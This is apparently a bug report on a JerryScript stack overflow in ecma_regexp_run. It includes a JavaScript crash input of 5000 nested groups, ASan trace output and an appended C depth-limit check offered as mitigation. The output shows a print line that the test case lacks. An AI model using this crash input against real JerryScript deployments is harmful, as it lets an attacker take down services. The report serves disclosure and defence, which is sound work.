
stack-overflow jerry-core/ecma/operations/ecma-regexp-object.c:535 in ecma_regexp_run #5265

@Qanux

Description

A stack overflow vulnerability was discovered in the JerryScript RegExp engine. The ecma_regexp_run function uses unbounded recursion when processing deeply nested patterns, leading to stack exhaustion and a crash (SIGSEGV).

JerryScript revision

b706935

Build platform

Ubuntu 22.04 LTS

Build steps

python3 tools/build.py --debug --lto=off --compile-flag=-fsanitize=address --compile-flag=-D_POSIX_C_SOURCE=200809 --compile-flag=-Wno-strict-prototypes

Test case

try {
    var depth = 5000;
    var s = "a".repeat(depth);
    var p = "";
    
    for(var i=0; i<depth; i++) p += "(";
    p += "a".repeat(depth);
    for(var i=0; i<depth; i++) p += ")";
    
    var re = new RegExp(p);
    re.test(s);
} catch(e) {
    print("Caught: " + e);
}

Execution steps

./build/bin/jerry poc.js

Output

Testing RegExp with depth 5000...
AddressSanitizer:DEADLYSIGNAL
=================================================================
==52670==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc243b7ca8 (pc 0x57e96b89ab1e bp 0x7ffc243b8050 sp 0x7ffc243b7be0 T0)
    #0 0x57e96b89ab1e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:535
    #1 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #2 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #3 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #4 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #5 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #6 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #7 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #8 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
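A defensive pre-compile check in the spirit of the report, added here as an example and not JerryScript's own code or fix: it measures how deeply groups nest in a pattern and refuses anything beyond a limit, so a matcher that recurses once per group never sees the 5000-level pattern above. DEMO_MAX_GROUP_DEPTH, the function names and the 32 KiB buffer are assumptions of this example.

```c
#include <stdbool.h>
#include <string.h>
/* Hypothetical nesting limit for this demo, not a JerryScript constant. */
#define DEMO_MAX_GROUP_DEPTH 256

/* Report the maximum group-nesting depth of a regexp pattern. Escaped parens
 * and parens inside a character class are not groups and are skipped. Returns
 * false if the pattern is unbalanced, so a caller can reject it early. */
bool regexp_group_depth (const char *pattern, size_t *max_depth_p)
{
  size_t depth = 0, max_depth = 0;
  bool in_class = false;
  for (const char *p = pattern; *p != '\0'; p++) {
    if (*p == '\\') {
      if (p[1] == '\0') return false; /* dangling escape */
      p++;                            /* skip the escaped character */
      continue;
    }
    if (in_class) {
      if (*p == ']') in_class = false;
      continue;
    }
    switch (*p) {
      case '[': in_class = true; break;
      case '(': if (++depth > max_depth) max_depth = depth; break;
      case ')': if (depth == 0) return false; depth--; break;
      default: break;
    }
  }
  *max_depth_p = max_depth;
  return depth == 0 && !in_class;
}

/* Accept a pattern only if it is balanced and nests within the limit. */
bool regexp_pattern_is_safe (const char *pattern)
{
  size_t depth;
  return regexp_group_depth (pattern, &depth) && depth <= DEMO_MAX_GROUP_DEPTH;
}

/* Constructed input: the reporter's "(((...aaa...)))" pattern with n groups. */
const char *build_nested_pattern (size_t n)
{
  static char buf[32768];
  if (3 * n + 1 > sizeof (buf)) return NULL;
  memset (buf, '(', n); memset (buf + n, 'a', n); memset (buf + 2 * n, ')', n);
  buf[3 * n] = '\0';
  return buf;
}
```

The same bound could instead be enforced inside the matcher as a recursion-depth counter that fails the match cleanly; checking the pattern up front has the advantage of rejecting it before any compilation work is done.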
